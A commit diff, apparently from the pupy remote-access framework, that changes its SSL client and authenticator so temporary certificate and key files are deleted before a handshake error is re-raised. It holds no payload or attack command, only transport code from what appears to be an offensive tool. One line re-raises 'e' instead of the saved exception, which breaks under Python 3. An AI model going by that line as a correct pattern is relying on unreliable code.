Delete-then-raise for tmp certs

pupy/network/lib/clients.py

@@ -121,6 +121,8 @@ class PupySSLClient(PupyTCPClient):
         os.write(fd_ca_path, self.SSL_CA_CERT)
         os.close(fd_ca_path)
 
+        exception = None
+
         try:
             wrapped_socket = ssl.wrap_socket(
                 socket,
@@ -132,11 +134,17 @@ class PupySSLClient(PupyTCPClient):
                 ssl_version=self.ssl_version,
                 ciphers=self.ciphers
             )
+        except Exception as e:
+            exception = e
+
         finally:
             os.unlink(tmp_cert_path)
             os.unlink(tmp_key_path)
             os.unlink(tmp_ca_path)
 
+        if exception:
+            raise e
+
         peer = wrapped_socket.getpeercert()
 
         peer_role = ''

pupy/network/transports/ssl/conf.py

@@ -40,6 +40,8 @@ class PupySSLAuthenticator(object):
         os.write(fd_ca_path, self.castr)
         os.close(fd_ca_path)
 
+        exception = None
+
         try:
             wrapped_socket = ssl.wrap_socket(
                 sock,
@@ -52,14 +54,15 @@ class PupySSLAuthenticator(object):
                 ciphers=self.ciphers
             )
         except ssl.SSLError:
-            ex = sys.exc_info()[1]
+            exception = sys.exc_info()[1]
-            raise AuthenticationError(str(ex))
 
         finally:
             os.unlink(tmp_cert_path)
             os.unlink(tmp_key_path)
             os.unlink(tmp_ca_path)
 
+        if exception:
+            raise AuthenticationError(str(exception))
 
         peer = wrapped_socket.getpeercert()
         peer_role = ''